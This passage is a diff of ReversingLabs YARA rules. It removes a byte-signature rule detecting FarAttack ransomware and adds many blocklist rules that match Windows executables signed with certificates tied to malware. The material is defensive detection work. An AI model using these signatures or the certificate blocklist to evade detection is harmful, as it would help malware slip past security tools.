 	meta:
-		description = "Yara rule that detects FarAttack ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7ee7121a-4ca2-513c-96dc-53b5c48d719f"
-		date = "2022-06-21"
-		modified = "2022-06-21"
+		id = "9688b091-9a77-59c2-b7f9-a8b652201b8f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.FarAttack.yara#L1-L93"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "af22b8110c2b545f083b443c7a1fa7e7639324e9188eefadfe1fe70ebb1bb7fb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14694-L14710"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5f35f520d4af26fa648553894a5b0db043d0c32302d94f531b6cb48691396a92"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "FarAttack"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            56 FF 73 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 50 FF 15 ?? ?? ?? ?? 56 E8 ??
-            ?? ?? ?? 59 6A ?? 58 E9 ?? ?? ?? ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 03 C7 89
-            45 ?? 3D ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? F7 06 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 4E ??
-            51 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? F6 06 ?? 74 ?? 8B 45 ?? 8D 04 45 ?? ?? ?? ?? 50 8D 46 ??
-            50 8B 43 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 8B 53 ??
-            8B 75 ?? 8B 01 53 89 44 72 ?? 66 8B 41 ?? 8B CE 66 89 44 4A ?? FF 43 ?? 83 63 ?? ??
-            E8 ?? ?? ?? ?? FF 4B ?? 83 63 ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 83 7B ?? ?? 75 ?? FF 73
-            ?? FF 73 ?? FF 73 ?? FF 73 ?? 57 FF 73 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? C7 43
-            ?? ?? ?? ?? ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ??
-            ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8D
-            04 45 ?? ?? ?? ?? 50 8D 46 ?? 50 8B 43 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 83 7E ?? ?? 75 ?? 83 7E ?? ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 8B F8 8B 45 ?? 8D 34 00
-            8D 4E ?? 51 E8 ?? ?? ?? ?? 56 89 07 FF 73 ?? 50 E8 ?? ?? ?? ?? 8B 07 33 C9 83 C4 ??
-            66 89 0C 06 8B 75 ?? 51 57 51 8B 46 ?? 89 47 ?? 8B 46 ?? 89 47 ?? 8B 45 ?? 89 47 ??
-            FF 73 ?? FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 4B ?? A1 ?? ?? ?? ?? 89 44 79 ?? 66 A1 ?? ??
-            ?? ?? 66 89 44 79 ?? 56 FF 75 ?? FF 15
-        }
-		$create_key = {
-            55 8B EC 56 6A ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 75 ?? 32 C0 EB ?? A1 ?? ?? ?? ?? 53
-            33 DB 85 C0 74 ?? 53 6A ?? 53 53 56 FF D0 EB ?? 8A C3 84 C0 75 ?? FF 15 ?? ?? ?? ??
-            3D ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? 53 53 56 FF D0 8A D8 84
-            DB 75 ?? 56 E8 ?? ?? ?? ?? 59 32 C0 EB ?? 8B 4D ?? B0 ?? 89 71 ?? 5B 5E 5D C3
-        }
-		$encrypt_files_p1 = {
-            50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 83
-            FF ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 0B 45 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 48 ?? 8B 40
-            ?? 83 C1 ?? 03 C1 8B 5D ?? 89 5D ?? 8B 4D ?? 89 4D ?? 99 03 D8 89 5D ?? 13 CA 89 4D
-            ?? 8B 55 ?? 8B 45 ?? 85 D2 7C ?? 7F ?? 3D ?? ?? ?? ?? 76 ?? 89 75 ?? EB ?? 83 65 ??
-            ?? 85 D2 7C ?? 7F ?? 3D ?? ?? ?? ?? 76 ?? 89 75 ?? EB ?? 83 65 ?? ?? C7 45 ?? ?? ??
-            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 59 89 4D ?? 51
-            52 50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 8B 4D ?? 6A ?? 53 51 6A ?? 6A ?? 57 FF 15 ??
-            ?? ?? ?? 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? B8 ?? ??
-            ?? ?? 89 45 ?? 89 45 ?? 33 C9 8B C1 89 45 ?? 89 45 ?? 89 4D ?? 89 4D ?? 89 45 ?? 89
-            45 ?? 89 4D ?? 8B 4D ?? FF 71 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? FF 71 ?? FF 71 ?? 8D 41 ?? 50
-            FF 71 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B 55 ?? 85 C0
-        }
-		$encrypt_files_p2 = {
-            75 ?? 89 55 ?? 21 45 ?? 8B CE 89 4D ?? 89 4D ?? EB ?? 8B 4D ?? 3B 4D ?? 0F 8D ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 85 C9 74 ?? 83 7D ?? ?? 74 ?? 8D 41 ?? 3B 45 ?? 74 ??
-            8B C1 99 FF 75 ?? FF 75 ?? 52 50 E8 ?? ?? ?? ?? 8B C8 89 45 ?? C7 45 ?? ?? ?? ?? ??
-            EB ?? 8B CA 81 E9 ?? ?? ?? ?? 89 4D ?? 8B 55 ?? 83 DA ?? 83 65 ?? ?? 89 55 ?? 6A ??
-            8B 45 ?? FF 70 ?? 52 51 E8 ?? ?? ?? ?? 6A ?? 8B 4D ?? FF 71 ?? 52 50 E8 ?? ?? ?? ??
-            8B C8 89 4D ?? 89 55 ?? 8B 45 ?? 2B C1 89 45 ?? 8B 4D ?? 1B CA 89 45 ?? 89 4D ?? EB
-            ?? 8B 55 ?? 8B C2 C1 F8 ?? FF 75 ?? FF 75 ?? 52 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ??
-            89 45 ?? 85 C0 75 ?? 50 FF 75 ?? FF 75 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ??
-            ?? ?? 8B 75 ?? 8B 7D ?? 83 4D ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45
-            ?? E8 ?? ?? ?? ?? C3 03 45 ?? 56 6A ?? 8D 4D ?? 51 50 FF 75 ?? 50 6A ?? 6A ?? 8D 85
-            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 45 ?? 40
-            89 45 ?? 3B 45 ?? 75 ?? 8B 75 ?? FF 76 ?? FF 76 ?? 8B 45 ?? 03 45 ?? 03 45 ?? 50 E8
-            ?? ?? ?? ?? FF 76 ?? FF 76 ?? 8B 46 ?? 03 45 ?? 03 45 ?? 03 45 ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 8B 7E ?? 03 7E ?? 03 7D ?? 03 7D ?? 8B 45 ?? 03 F8 8D 75 ?? A5 A5 A5 A5 6A
-            ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 F6 46 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 89 4D
-            ?? 8B 55 ?? 8B 45 ?? E9 ?? ?? ?? ?? 53 8B 35 ?? ?? ?? ?? FF D6
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "5b:47:a4:73:9d:d8:ff:e8:1d:9b:53:07" and 1476953007 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_4F5A9Bf75Da76B949645475473793A7D : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "90cdf420-bdfc-509a-a64f-f30710f09f3b"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14712-L14728"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8c58d30b1b6ef80409d9da5f5f4bc26a8818b01cc388b5966c8b68ed0e4c5a2a"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXEC CONTROL LIMITED" and pe.signatures [ i ] . serial == "4f:5a:9b:f7:5d:a7:6b:94:96:45:47:54:73:79:3a:7d" and 1553817600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_081Df56C9A48D02571F08907 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "4f4fb099-406a-5def-9a26-46c6807cfe7f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14730-L14746"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "25d91f09e0731ab09a05855442b72589eb30e1c7d5e4c0a7af760eea540d786f"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "08:1d:f5:6c:9a:48:d0:25:71:f0:89:07" and 1474870728 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_77D5C1A3E623575999C74409Dc19753C : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "8f8ce24d-8330-509a-a7a1-2727c6f8bdd9"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14748-L14764"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "54921ce39a0876511b33ac6fa088c3342e2ea7fa037423fe72825bfe9c83bce6"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "77:d5:c1:a3:e6:23:57:59:99:c7:44:09:dc:19:75:3c" and 1475884800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_E9756B3F38B1172Ea89Fdbdfdba5F979 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "77d7470c-0c60-5ef4-b1d9-35642c147afe"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14766-L14784"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "997a9433f907896d82f22ae323bf9cfe9aa04a2a49c5505e98adbb34277fcc15"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kreamer Ltd" and ( pe.signatures [ i ] . serial == "00:e9:75:6b:3f:38:b1:17:2e:a8:9f:db:df:db:a5:f9:79" or pe.signatures [ i ] . serial == "e9:75:6b:3f:38:b1:17:2e:a8:9f:db:df:db:a5:f9:79" ) and 1492732800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_09Fb28 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "e7701457-c6cd-5b20-b227-8a9cdcde8213"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14786-L14802"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5ed65d33b73977e869460ba51271aff94811fa2f41e4a2993c47233add2f38dd"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "New Dial spa" and pe.signatures [ i ] . serial == "09:fb:28" and 1046968418 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_197Dc32D915458953562D2Fe78Bf2468 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "9c25410f-6a3d-5e6e-b270-ccec3be34e80"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14804-L14820"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e61284a74765592fe97b90ca1c260efa46ea31286e6d09ab32d6c664b8271f2a"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Y.L. Knafo, Ltd." and pe.signatures [ i ] . serial == "19:7d:c3:2d:91:54:58:95:35:62:d2:fe:78:bf:24:68" and 1575331200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_7C0Be3D14787351E3156F5F37F2B3663 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "14a292da-36c1-5a37-b27e-20c982e44c25"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14822-L14838"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "66c2cd84fccedd2afef00495c49d0c2844e2e5e190e6a859d2970e8ddb4a35c2"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Apex Tech, SIA" and pe.signatures [ i ] . serial == "7c:0b:e3:d1:47:87:35:1e:31:56:f5:f3:7f:2b:36:63" and 1523318400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_05054Fdea356F3Dd7Db479Fa : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "c78d42bc-f8ca-579a-af49-ba9c7b63ef07"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14840-L14856"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "02ec52e060a6b8b3edfad0a1f5b1f2d6c409645d5233612d0d353ad74bcd4568"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "05:05:4f:de:a3:56:f3:dd:7d:b4:79:fa" and 1474436511 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_08Aaa069E92517F21Ce67Ca713F6Ea63 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "d468530e-8a51-583e-a108-e409f0144165"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14858-L14874"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "28ad7e9c75a701425003cde4a7eb10fa471394628cd5004412778d8d7cddb50b"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "pioneersoft" and pe.signatures [ i ] . serial == "08:aa:a0:69:e9:25:17:f2:1c:e6:7c:a7:13:f6:ea:63" and 1368403200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_1B7B54E0Dd4D7E45A0B46834De52658D : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "376da749-3cd4-5e37-b1ee-013e839f98ce"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14876-L14892"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5febbce8c39440bfc4846f509f0b1dd4f71a8b4dc24fa18afb561d26e53c2446"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "1b:7b:54:e0:dd:4d:7e:45:a0:b4:68:34:de:52:65:8d" and 1476662400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_B63E4299D0B0E2Dcdaeb976167A23235 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "44af31cc-e0c9-5f3f-9645-a0453bc81e62"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14894-L14912"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "da7415d0bc0245dea6a4ec325da5140c79c723c20fb7c04ff14f59a3089a5c88"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Baltservis LLC" and ( pe.signatures [ i ] . serial == "00:b6:3e:42:99:d0:b0:e2:dc:da:eb:97:61:67:a2:32:35" or pe.signatures [ i ] . serial == "b6:3e:42:99:d0:b0:e2:dc:da:eb:97:61:67:a2:32:35" ) and 1604102400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_1Dabae616705F5A51152Eac48423F354 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "8b050402-d5d3-5733-9a72-02386d850a04"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14914-L14930"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0bb14ececa3a78e1a2e71cfdee8bc57678251b15151d156ef5fa754b2438ee35"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "1d:ab:ae:61:67:05:f5:a5:11:52:ea:c4:84:23:f3:54" and 1470960000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_50D08F3C9Bf86Fba52Cf592B4Fe6Eacf : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "f315cdda-4b95-534d-94db-9a04e2da6385"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14932-L14948"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ca613e4b45b9bb1ef7564b9fc6321bccc0f683298de692a3db2bf841db9010ef"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CLEVERCYBER LTD" and pe.signatures [ i ] . serial == "50:d0:8f:3c:9b:f8:6f:ba:52:cf:59:2b:4f:e6:ea:cf" and 1518134400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_7C7Fc3616F3157A28F702Cc1Df275Dcd : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "78d2adb9-fc1c-5f48-80cb-3f1bd12b6ba5"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14950-L14966"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c2dcea21c7a3e3aef6408f11c23edbce6d8f655f298654552a607a9b0caabb28"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CFES Projects Ltd" and pe.signatures [ i ] . serial == "7c:7f:c3:61:6f:31:57:a2:8f:70:2c:c1:df:27:5d:cd" and 1522972800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_73Ed1B2F4Bf8Dd37A8Ad9Bb775774592 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "19c9e100-b017-5b5c-8e8f-c94ea9e228c2"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14968-L14984"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "69865935e07ea255a5d690e170911b33574ea61550b00bebc2ceff91ba9a33da"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5000 LIMITED" and pe.signatures [ i ] . serial == "73:ed:1b:2f:4b:f8:dd:37:a8:ad:9b:b7:75:77:45:92" and 1528243200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_211B5Dfe65Bc6F34Bc9D3A54 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "5181b6e4-6a25-58f6-88c5-0eae98250648"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14986-L15002"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cf2e4c0dd98efb77c28b63641196c83e60afc0d6ab64802743c351581506dbb5"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
